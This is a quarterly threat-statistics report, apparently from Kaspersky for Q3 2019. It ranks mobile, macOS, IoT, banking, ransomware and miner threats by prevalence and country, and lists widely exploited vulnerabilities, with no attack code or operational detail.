Among all the mobile threats detected in Q3 2019, the lion's share went to potentially unwanted RiskTool-class programs (32.1%), which experienced a fall of 9 p.p. against the previous quarter. The most frequently detected objects were in the RiskTool.AndroidOS families: Agent (33.07% of all detected threats in this class), RiskTool.AndroidOS.Wapron (16.43%), and RiskTool.AndroidOS.Smssend (10.51%).

Second place went to miscellaneous Trojans united under the Trojan class (21.68%), whose share increased by 10 p.p. The distribution within the class was unchanged since the previous quarter, with the Trojan.AndroidOS.Hiddapp (32.5%), Trojan.AndroidOS.Agent (12.8%), and Trojan.AndroidOS.Piom (9.1%) families remaining in the lead.
Kaspersky's machine-learning systems made a significant contribution to detecting threats: Trojans detected by this technology (the Trojan.AndroidOS.Boogr verdict) made up 28.7% — second place after Hiddapp.

In third place were Adware-class programs (19.89%), whose share rose by 1 p.p. in the reporting period. Most often, adware programs belonged to one of the following families: AdWare.AndroidOS.Ewind (20.73% of all threats in this class), AdWare.AndroidOS.Agent (20.36%), and AdWare.AndroidOS.MobiDash (14.27%).

Threats in the Trojan-Dropper class (10.44%) remained at the same level with insignificant (0.5 p.p.) growth. The vast majority of detected droppers belonged to the Trojan-Dropper.AndroidOS.Wapnor family (69.7%). A long way behind in second and third place, respectively, were Trojan-Dropper.AndroidOS.Wroba (14.58%) and Trojan-Dropper.AndroidOS.Agent (8.75%).

### TOP 20 mobile malware programs

_Note that this malware rating does not include potentially dangerous or unwanted programs classified as RiskTool or adware._

| No. | Verdict | %* |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 48.71 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 9.03 |
| 3 | Trojan.AndroidOS.Hiddapp.ch | 7.24 |
| 4 | Trojan.AndroidOS.Hiddapp.cr | 7.23 |
| 5 | Trojan-Dropper.AndroidOS.Necro.n | 6.87 |
| 6 | DangerousObject.AndroidOS.GenericML | 4.34 |
| 7 | Trojan-Downloader.AndroidOS.Helper.a | 1.99 |
| 8 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.75 |
| 9 | Trojan-Dropper.AndroidOS.Agent.ok | 1.65 |
| 10 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.52 |
| 11 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.46 |
| 12 | Trojan-Downloader.AndroidOS.Necro.b | 1.45 |
| 13 | Trojan-Dropper.AndroidOS.Lezok.p | 1.44 |
| 14 | Trojan.AndroidOS.Hiddapp.cf | 1.41 |
| 15 | Trojan.AndroidOS.Dvmap.a | 1.27 |
| 16 | Trojan.AndroidOS.Agent.rt | 1.24 |
| 17 | Trojan-Banker.AndroidOS.Asacub.snt | 1.21 |
| 18 | Trojan-Dropper.AndroidOS.Necro.q | 1.19 |
| 19 | Trojan-Dropper.AndroidOS.Necro.l | 1.12 |
| 20 | Trojan-SMS.AndroidOS.Prizmes.a | 1.12 |
_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._

First place in our TOP 20 as ever went to DangerousObject.Multi.Generic (48.71%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.

Second and sixth places were claimed by Trojan.AndroidOS.Boogr.gsh (9.03%) and DangerousObject.AndroidOS.GenericML (4.34%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

Third, fourth, and fourteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to covertly foist ads onto victims.

Fifth, twelfth, eighteenth, and nineteenth positions went to Trojan droppers of the Necro family. Although this family showed up on the radar last quarter, really serious activity was observed only in this reporting period.

Seventh place goes to Trojan-Downloader.AndroidOS.Helper.a (1.99%), which is what members of the Necro family usually extract from themselves. Helper.a is tasked with downloading arbitrary code from malicious servers and running it.

Eighth place was taken by the malware Trojan-Banker.AndroidOS.Svpeng.ak (1.75%), the main task of which is to steal online banking credentials and intercept two-factor authorization codes.

Ninth position went to Trojan-Dropper.AndroidOS.Agent.ok (1.65%), which is distributed under the guise of FlashPlayer or a Rapidshare client.
Most commonly, it drops adware modules into the infected system.

Tenth and eleventh places went to members of the Trojan-Dropper.AndroidOS.Hqwar family. The popularity of this dropper among cybercriminals [continues to fall](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>).

### Geography of mobile threats

_Geography of mobile malware infection attempts, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171307/malware-q3-2019-statistics-en-4.png>)

**TOP 10 countries by share of users attacked by mobile malware**

| No. | Country* | %** |
|---|---|---|
| 1 | Iran | 52.68 |
| 2 | Bangladesh | 30.94 |
| 3 | India | 28.75 |
| 4 | Pakistan | 28.13 |
| 5 | Algeria | 26.47 |
| 6 | Indonesia | 23.38 |
| 7 | Nigeria | 22.46 |
| 8 | Tanzania | 21.96 |
| 9 | Saudi Arabia | 20.05 |
| 10 | Egypt | 19.44 |

_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._

_** Unique users attacked by mobile malware as a percentage of all users of Kaspersky mobile solutions in the country._

In Q3's TOP 10, Iran (52.68%) retained top spot by share of attacked users. Note that over the reporting period the country's share almost doubled. Kaspersky users in Iran most often encountered the adware app AdWare.AndroidOS.Agent.fa (22.03% of the total number of mobile threats), the adware-installing Trojan.AndroidOS.Hiddapp.bn (14.68%) and the potentially unwanted program RiskTool.AndroidOS.Dnotua.yfe (8.84%).

Bangladesh (30.94%) retained second place in the ranking.
Users in this country most frequently encountered adware programs, including AdWare.AndroidOS.Agent.fc (27.58% of the total number of mobile threats) and AdWare.AndroidOS.HiddenAd.et (12.65%), as well as Trojan.AndroidOS.Hiddapp.cr (20.05%), which downloads adware programs.

India (28.75%) climbed to third place due to the same threats that were more active than others in Bangladesh: AdWare.AndroidOS.Agent.fc (36.19%), AdWare.AndroidOS.HiddenAd.et (17.17%) and Trojan.AndroidOS.Hiddapp.cr (22.05%).

### Mobile banking Trojans

In the reporting period, we detected **13,129** installation packages for mobile banking Trojans, only 770 fewer than in Q2 2019.

The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Svpeng (40.59% of all detected banking Trojans), Trojan-Banker.AndroidOS.Agent (11.84%), and Trojan-Banker.AndroidOS.Faketoken (11.79%) families.

_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 – Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171313/malware-q3-2019-statistics-en-5.png>)

**TOP 10 mobile banking Trojans**

| No. | Verdict | %* |
|---|---|---|
| 1 | Trojan-Banker.AndroidOS.Svpeng.ak | 16.85 |
| 2 | Trojan-Banker.AndroidOS.Asacub.snt | 11.61 |
| 3 | Trojan-Banker.AndroidOS.Svpeng.q | 8.97 |
| 4 | Trojan-Banker.AndroidOS.Asacub.ce | 8.07 |
| 5 | Trojan-Banker.AndroidOS.Agent.ep | 5.51 |
| 6 | Trojan-Banker.AndroidOS.Asacub.a | 5.27 |
| 7 | Trojan-Banker.AndroidOS.Faketoken.q | 5.26 |
| 8 | Trojan-Banker.AndroidOS.Agent.eq | 3.62 |
| 9 | Trojan-Banker.AndroidOS.Faketoken.snt | 2.91 |
| 10 | Trojan-Banker.AndroidOS.Asacub.ar | 2.81 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by banking threats._

The TOP 10 banking threats in Q3 2019 was headed by Trojans of the Trojan-Banker.AndroidOS.Svpeng family: Svpeng.ak (16.85%) took first place, and
Svpeng.q (8.97%) third. This is not the first time we have detected amusing obfuscation in Trojans from Russian-speaking cybercriminals — this time the code of the malware Svpeng.ak featured the names of video games.

[(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171317/malware-q3-2019-statistics-en-6.png>)

_Snippets of decompiled code from Trojan-Banker.AndroidOS.Svpeng.ak_

Second, fourth, sixth, and tenth positions in Q3 went to the Asacub Trojan family. Despite a decrease in activity, Asacub samples are still found on devices around the world.

_Geography of mobile banking threats, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171323/malware-q3-2019-statistics-en-7.png>)

**TOP 10 countries by share of users attacked by mobile banking Trojans:**

| No. | Country* | %** |
|---|---|---|
| 1 | Russia | 0.30 |
| 2 | South Africa | 0.20 |
| 3 | Kuwait | 0.18 |
| 4 | Tajikistan | 0.13 |
| 5 | Spain | 0.12 |
| 6 | Indonesia | 0.12 |
| 7 | China | 0.11 |
| 8 | Singapore | 0.11 |
| 9 | Armenia | 0.10 |
| 10 | Uzbekistan | 0.10 |

_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._

_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._

In Q3 Russia moved up to first place (0.30%), which impacted the entire pattern of mobile bankers spread around the world. Users in Russia were most often targeted with Trojan-Banker.AndroidOS.Svpeng.ak (17.32% of all attempts to infect unique users with mobile financial malware). The same Trojan made it into the TOP 10 worldwide.
It is a similar story with second and third places: Trojan-Banker.AndroidOS.Asacub.snt (11.86%) and Trojan-Banker.AndroidOS.Svpeng.q (9.20%).

South Africa fell to second place (0.20%), where for the second quarter in a row Trojan-Banker.AndroidOS.Agent.dx (89.80% of all mobile financial malware) was the most widespread threat.

Bronze went to Kuwait (0.21%), where, like in South Africa, Trojan-Banker.AndroidOS.Agent.dx (75%) was most often encountered.

### Mobile ransomware Trojans

In Q3 2019, we detected 13,179 installation packages for mobile ransomware — 10,115 fewer than last quarter. We observed a similar drop in Q2, so since the start of the year the number of mobile ransomware Trojans has decreased almost threefold. The reason, as we see it, is the decline in activity of the group behind the Asacub Trojan.

_Number of installation packages for mobile banking Trojans, Q3 2018 – Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171329/malware-q3-2019-statistics-en-8.png>)

**TOP 10 mobile ransomware Trojans**

| No. | Verdict | %* |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 40.97 |
| 2 | Trojan-Ransom.AndroidOS.Small.as | 8.82 |
| 3 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.79 |
| 4 | Trojan-Ransom.AndroidOS.Rkor.i | 5.20 |
| 5 | Trojan-Ransom.AndroidOS.Rkor.h | 4.78 |
| 6 | Trojan-Ransom.AndroidOS.Small.o | 3.60 |
| 7 | Trojan-Ransom.AndroidOS.Svpeng.ai | 2.93 |
| 8 | Trojan-Ransom.AndroidOS.Small.ce | 2.93 |
| 9 | Trojan-Ransom.AndroidOS.Fusob.h | 2.72 |
| 10 | Trojan-Ransom.AndroidOS.Small.cj | 2.66 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._

In Q3 2019, the leading positions among ransomware Trojans were retained by members of the Trojan-Ransom.AndroidOS.Svpeng family.
Top spot, as in the previous quarter, was claimed by Svpeng.aj (40.97%), with Svpeng.ah (5.79%) in third.

_Geography of mobile ransomware Trojans, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171337/malware-q3-2019-statistics-en-9.png>)

**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**

| No. | Country* | %** |
|---|---|---|
| 1 | US | 1.12 |
| 2 | Iran | 0.25 |
| 3 | Kazakhstan | 0.25 |
| 4 | Oman | 0.09 |
| 5 | Qatar | 0.08 |
| 6 | Saudi Arabia | 0.06 |
| 7 | Mexico | 0.05 |
| 8 | Pakistan | 0.05 |
| 9 | Kuwait | 0.04 |
| 10 | Indonesia | 0.04 |

_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._

_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._

The leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.12%), Iran (0.25%), and Kazakhstan (0.25%).

## Attacks on Apple macOS

Q3 saw a lull in the emergence of new threats.
An exception was the distribution of a [modified version](<https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/>) of the Stockfolio investment app, which contained an encrypted reverse shell backdoor.

### TOP 20 threats for macOS

| No. | Verdict | %* |
|---|---|---|
| 1 | Trojan-Downloader.OSX.Shlayer.a | 22.71 |
| 2 | AdWare.OSX.Pirrit.j | 14.43 |
| 3 | AdWare.OSX.Pirrit.s | 11.73 |
| 4 | AdWare.OSX.Pirrit.p | 10.43 |
| 5 | AdWare.OSX.Pirrit.o | 9.71 |
| 6 | AdWare.OSX.Bnodlero.t | 8.40 |
| 7 | AdWare.OSX.Spc.a | 7.32 |
| 8 | AdWare.OSX.Cimpli.d | 6.92 |
| 9 | AdWare.OSX.MacSearch.a | 4.88 |
| 10 | Adware.OSX.Agent.d | 4.71 |
| 11 | AdWare.OSX.Ketin.c | 4.63 |
| 12 | AdWare.OSX.Ketin.b | 4.10 |
| 13 | Downloader.OSX.InstallCore.ab | 4.01 |
| 14 | AdWare.OSX.Cimpli.e | 3.86 |
| 15 | AdWare.OSX.Bnodlero.q | 3.78 |
| 16 | AdWare.OSX.Cimpli.f | 3.76 |
| 17 | AdWare.OSX.Bnodlero.x | 3.49 |
| 18 | AdWare.OSX.Mcp.a | 3.26 |
| 19 | AdWare.OSX.MacSearch.d | 3.18 |
| 20 | AdWare.OSX.Amc.a | 3.15 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._

Like last quarter, the adware Trojan Shlayer was the top threat for macOS.
This malware in turn downloaded adware programs of the Pirrit family, as a result of which its members took the second to fifth positions in our ranking.

### Threat geography

| No. | Country* | %** |
|---|---|---|
| 1 | France | 6.95 |
| 2 | India | 6.24 |
| 3 | Spain | 5.61 |
| 4 | Italy | 5.29 |
| 5 | US | 4.84 |
| 6 | Russia | 4.79 |
| 7 | Brazil | 4.75 |
| 8 | Mexico | 4.68 |
| 9 | Canada | 4.46 |
| 10 | Australia | 4.27 |

_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._

_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._

The geographical distribution of attacked users underwent some minor changes: India took silver with 6.24% of attacked users, while Spain came in third with 5.61%. France (6.95%) hung on to first position.

## IoT attacks

### IoT threat statistics

In Q3, the trend continued toward a decrease in the number of IP addresses of devices used to carry out attacks on Kaspersky Telnet honeypots. Whereas in Q2 Telnet's share was still significantly higher than that of SSH, in Q3 the figures were almost equal.

| Service | Share |
|---|---|
| SSH | 48.17% |
| Telnet | 51.83% |

_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2019_

As for the number of sessions involving Kaspersky [traps](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we noted that in Q3 Telnet-based control was also deployed more often.
| Service | Share |
|---|---|
| SSH | 40.81% |
| Telnet | 59.19% |

_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2019_

### Telnet-based attacks

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171344/malware-q3-2019-statistics-en-10.png>)

**TOP 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky traps**

| No. | Country | %* |
|---|---|---|
| 1 | China | 13.78 |
| 2 | Egypt | 10.89 |
| 3 | Brazil | 8.56 |
| 4 | Taiwan | 8.33 |
| 5 | US | 4.71 |
| 6 | Russia | 4.35 |
| 7 | Turkey | 3.47 |
| 8 | Vietnam | 3.44 |
| 9 | Greece | 3.43 |
| 10 | India | 3.41 |

Last quarter's leaders Egypt (10.89%), China (13.78%), and Brazil (8.56%) again made up the TOP 3, the only difference being that this time China took first place.

Telnet-based attacks most often resulted in the download of a member of the notorious Mirai family.

**TOP 10 malware downloaded to infected IoT devices via successful telnet-based attacks**

| No. | Verdict | %* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.b | 38.08 |
| 2 | Trojan-Downloader.Linux.NyaDrop.b | 27.46 |
| 3 | Backdoor.Linux.Mirai.ba | 16.52 |
| 4 | Backdoor.Linux.Gafgyt.bj | 2.76 |
| 5 | Backdoor.Linux.Mirai.au | 2.21 |
| 6 | Backdoor.Linux.Mirai.c | 2.02 |
| 7 | Backdoor.Linux.Mirai.h | 1.81 |
| 8 | Backdoor.Linux.Mirai.ad | 1.66 |
| 9 | Backdoor.Linux.Gafgyt.az | 0.86 |
| 10 | Backdoor.Linux.Mirai.a | 0.80 |

_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful Telnet-based attack._

### SSH-based attacks

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171352/malware-q3-2019-statistics-en-11.png>)

**TOP 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**

| No. | Country | %* |
|---|---|---|
| 1 | Egypt | 17.06 |
| 2 | Vietnam | 16.98 |
| 3 | China | 13.81 |
| 4 | Brazil | 7.37 |
| 5 | Russia | 6.71 |
| 6 | Thailand | 4.53 |
| 7 | US | 4.13 |
| 8 | Azerbaijan | 3.99 |
| 9 | India | 2.55 |
| 10 | France | 1.53 |

In Q3 2019, the largest number of attacks on Kaspersky traps using the SSH protocol came from Egypt (17.06%). Vietnam (16.98%) and China (13.81%) took second and third places, respectively.

## Financial threats

### Financial threat statistics

In Q3 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 197,559 users.

_Number of unique users attacked by financial malware, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171358/malware-q3-2019-statistics-en-12.png>)

### Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

_Geography of banking malware attacks, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171406/malware-q3-2019-statistics-en-13.png>)

**TOP 10 countries by share of attacked users**

| No. | Country* | %** |
|---|---|---|
| 1 | Belarus | 2.9 |
| 2 | Uzbekistan | 2.1 |
| 3 | South Korea | 1.9 |
| 4 | Venezuela | 1.8 |
| 5 | Tajikistan | 1.4 |
| 6 | Afghanistan | 1.3 |
| 7 | China | 1.2 |
| 8 | Syria | 1.2 |
| 9 | Yemen | 1.2 |
| 10 | Sudan | 1.1 |

_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._

_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._

**TOP 10 banking malware families**

| No. | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 26.7 |
| 2 | Emotet | Backdoor.Win32.Emotet | 23.9 |
| 3 | RTM | Trojan-Banker.Win32.RTM | 19.3 |
| 4 | Nimnul | Virus.Win32.Nimnul | 6.6 |
| 5 | Trickster | Trojan.Win32.Trickster | 5.8 |
| 6 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.4 |
| 7 | Nymaim | Trojan.Win32.Nymaim | 3.6 |
| 8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.4 |
| 9 | Danabot | Trojan-Banker.Win32.Danabot | 3.3 |
| 10 | Neurevt | Trojan.Win32.Neurevt | 1.8 |

_* Unique users attacked by this malware as a percentage of all users attacked by financial malware._

The TOP 3 in Q3 2019 had the same faces as last quarter, only in a different order: the RTM family (19.3%) dropped from first to third, shedding almost 13 p.p., allowing the other two — Zbot (26.7%) and Emotet (23.9%) — to climb up. Last quarter we noted a decline in the activity of Emotet servers, but in Q3 it came back on track, with Emotet's share growing by more than 15 p.p.

Fourth and fifth places did not change at all — still occupied by Nimnul (6.6%) and Trickster (5.8%). Their scores rose insignificantly, by less than 1 p.p. Of the new entries in our TOP 10, worth noting is the banker CliptoShuffler (5.4%), which stormed straight into sixth place.

## Ransomware programs

### Quarterly highlights

The number of ransomware attacks against [government](<https://threatpost.com/ransomware-demand-massachusetts-city-no-thanks/148034/>) [agencies](<https://threatpost.com/coordinated-ransomware-attack-hits-23-texas-government-agencies/147457/>), as well as organizations in the healthcare, [education](<https://www.bleepingcomputer.com/news/security/monroe-college-hit-with-ransomware-2-million-demanded/>), and [energy](<https://www.bleepingcomputer.com/news/security/ransomware-attack-cripples-power-company-s-entire-network/>) sectors, continues to rise.
We [noted](<https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/#glavnye-sobytiya-kvartala>) this trend back in the previous quarter.

A [new type of attack](<https://threatpost.com/linux-ransomware-nas-servers/146441/>), on network attached storage (NAS) devices, is gaining ground. The infection scheme involves attackers scanning IP address ranges in search of NAS devices accessible via the Internet. Generally, only the web interface is accessible from the outside, protected by an authentication page; however, a number of devices have vulnerabilities in their firmware. This enables cybercriminals, by means of an exploit, to install on the device a Trojan that encrypts all data on NAS-connected media. This is a particularly dangerous attack, since in many cases the NAS is used to store backups; such devices are generally perceived by their owners as a reliable means of storage, and the mere possibility of an infection can come as a shock.

[Wipers](<https://encyclopedia.kaspersky.com/glossary/wiper/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) have also become a [more frequent attack tool](<https://www.bleepingcomputer.com/news/security/destructive-ordinypt-malware-hitting-germany-in-new-spam-campaign/>). Like ransomware, such programs rename files and make ransom demands. But these Trojans irreversibly ruin the file contents (replacing them with zeros or random bytes), so even if the victim pays up, the original files are lost.

The FBI published decryption keys for GandCrab (verdict Trojan-Ransom.Win32.GandCrypt) versions 4 and 5.
The decryption was added to the latest [RakhniDecryptor](<https://support.kaspersky.com/10556>) build.\n\n### Number of new modifications\n\nIn Q3 2019, we identified three new families of ransomware Trojans and discovered 13,138 new modifications of this malware.\n\n_Number of new ransomware modifications, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171414/malware-q3-2019-statistics-en-14.png>)\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2019, Kaspersky products defeated ransomware attacks against 229,643 unique KSN users. This is slightly fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171421/malware-q3-2019-statistics-en-15.png>)\n\nJuly saw the largest number of attacked users \u2014 100,380, almost 20,000 more than in June. After that, however, this indicator fell sharply and did not stray far from the figure of 90,000 attacked users.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171430/malware-q3-2019-statistics-en-16.png>)\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 6.39 \n2 | Mozambique | 2.96 \n3 | Uzbekistan | 2.26 \n4 | Nepal | 1.71 \n5 | Ethiopia | 1.29 \n6 | Ghana | 1.19 \n7 | Afghanistan | 1.12 \n8 | Egypt | 0.83 \n9 | Palestine | 0.80 \n10 | Vietnam | 0.79 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | 
**Verdicts** | **% of attacked users*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.96 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 20.01 | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 8.58 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 8.36 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 6.56 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 5.08 | \n7 | Stop | Trojan-Ransom.Win32.Stop | 4.63 | \n8 | Rakhni | Trojan-Ransom.Win32.Rakhni | 3.97 | \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 2.77 | \n10 | PolyRansom/VirLock | Virus.Win32.PolyRansom, Trojan-Ransom.Win32.PolyRansom | 2.50 | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q3 2019, Kaspersky solutions detected 11,753 new modifications of miners.\n\n_Number of new miner modifications, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171437/malware-q3-2019-statistics-en-17.png>)\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 639,496 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171445/malware-q3-2019-statistics-en-18.png>)\n\nThe number of attacked users continued to decline in Q3, down to 282,334 in August. 
In September, this indicator began to grow \u2014 up to 297,394 \u2014 within touching distance of July's figure.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171455/malware-q3-2019-statistics-en-19.png>)\n\n**TOP 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 9.42 \n2 | Ethiopia | 7.29 \n3 | Uzbekistan | 4.99 \n4 | Sri Lanka | 4.62 \n5 | Tanzania | 4.35 \n6 | Vietnam | 3.72 \n7 | Kazakhstan | 3.66 \n8 | Mozambique | 3.44 \n9 | Rwanda | 2.55 \n10 | Bolivia | 2.43 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nAs before, in the statistics on the distribution of exploits used by cybercriminals, a huge share belongs to vulnerabilities in the Microsoft Office suite (73%). Most common of all, as in the previous quarter, were stack overflow errors ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)) in the Equation Editor application, which was previously part of Microsoft Office. 
Other Microsoft Office vulnerabilities widely exploited this quarter were again [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), and [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>).\n\nModern browsers are complex software products, which means that new vulnerabilities are constantly being discovered and used in attacks (13%). The most common target for cybercriminals is Microsoft Internet Explorer, vulnerabilities in which are often exploited in the wild. This quarter saw the discovery of the actively exploited zero-day vulnerability [CVE-2019-1367](<https://www.helpnetsecurity.com/2019/09/24/cve-2019-1367/>), which causes memory corruption and allows remote code execution on the target system. The fact that Microsoft released an unscheduled patch for it points to how serious the situation was. Nor was Google Chrome problem-free this quarter, having received updates to fix a number of [critical vulnerabilities](<https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-google-chrome-could-allow-for-arbitrary-code-execution_2019-095/>) (CVE-2019-13685, CVE-2019-13686, CVE-2019-13687, CVE-2019-13688), some of which allow intruders to circumvent all levels of browser protection and execute code in the system, bypassing the [sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\nThe majority of vulnerabilities aimed at privilege escalation inside the system stem from individual operating system services and popular apps. Privilege escalation vulnerabilities play a special role, as they are often utilized in malicious software to obtain persistence in the target system. 
Of note this quarter are the vulnerabilities [CVE-2019-14743](<https://www.bleepingcomputer.com/news/security/steam-security-saga-continues-with-vulnerability-fix-bypass/>) and [CVE-2019-15315](<https://nvd.nist.gov/vuln/detail/CVE-2019-15315>), which allow systems with the popular Steam client installed to be compromised. A flaw in the Microsoft Windows Text Services Framework also warrants a mention. A Google researcher published a tool to demonstrate the problem ([CtfTool](<https://blog.stealthbits.com/using-ctftool-exe-to-escalate-privileges-by-leveraging-text-services-framework-and-mitigation-processes-and-steps/>)), which allows processes to be run with system privileges, as well as changes to be made to the memory of other processes and arbitrary code to be executed in them.\n\n_Distribution of exploits used in attacks by type of application attacked, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171502/malware-q3-2019-statistics-en-20.png>)\n\nNetwork attacks are still widespread. This quarter, as in previous ones, we registered numerous attempts to exploit vulnerabilities in the SMB protocol. This indicates that unprotected and unpatched systems are still at high risk of infection in attacks that deploy EternalBlue, EternalRomance, and other exploits. That said, a large share of malicious network traffic is made up of requests aimed at brute-forcing passwords in popular network services and servers, such as Remote Desktop Protocol and Microsoft SQL Server. 
